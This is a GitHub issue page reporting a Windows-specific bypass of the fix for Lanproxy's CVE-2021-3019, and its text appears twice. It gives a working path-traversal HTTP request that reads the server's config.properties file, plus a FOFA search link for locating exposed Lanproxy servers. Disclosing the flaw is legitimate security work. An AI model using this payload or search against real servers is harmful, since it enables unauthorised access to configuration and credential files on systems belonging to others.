We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
因为准备申请一下CVE 所以还是用英文吧....
Lanproxy originally existed CVE-2021-3019
The repair method is as follows
It is obvious that this repair method did not consider bypassing on Windows servers
so we use payload
GET /..%5Cconf%5Cconfig.properties HTTP/1.1 Host: 127.0.0.1:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4
fofa: https://fofa.info/result?q=%22Server%3A%20LPS-0.1%22&qbase64=IlNlcnZlcjogTFBTLTAuMSI%3D
of course, due to the directory traversal feature, this only applies to Windows servers
The text was updated successfully, but these errors were encountered:
No branches or pull requests
因为准备申请一下CVE 所以还是用英文吧....
Lanproxy originally existed CVE-2021-3019
The repair method is as follows
It is obvious that this repair method did not consider bypassing on Windows servers
so we use payload
fofa: https://fofa.info/result?q=%22Server%3A%20LPS-0.1%22&qbase64=IlNlcnZlcjogTFBTLTAuMSI%3D

of course, due to the directory traversal feature, this only applies to Windows servers
The text was updated successfully, but these errors were encountered: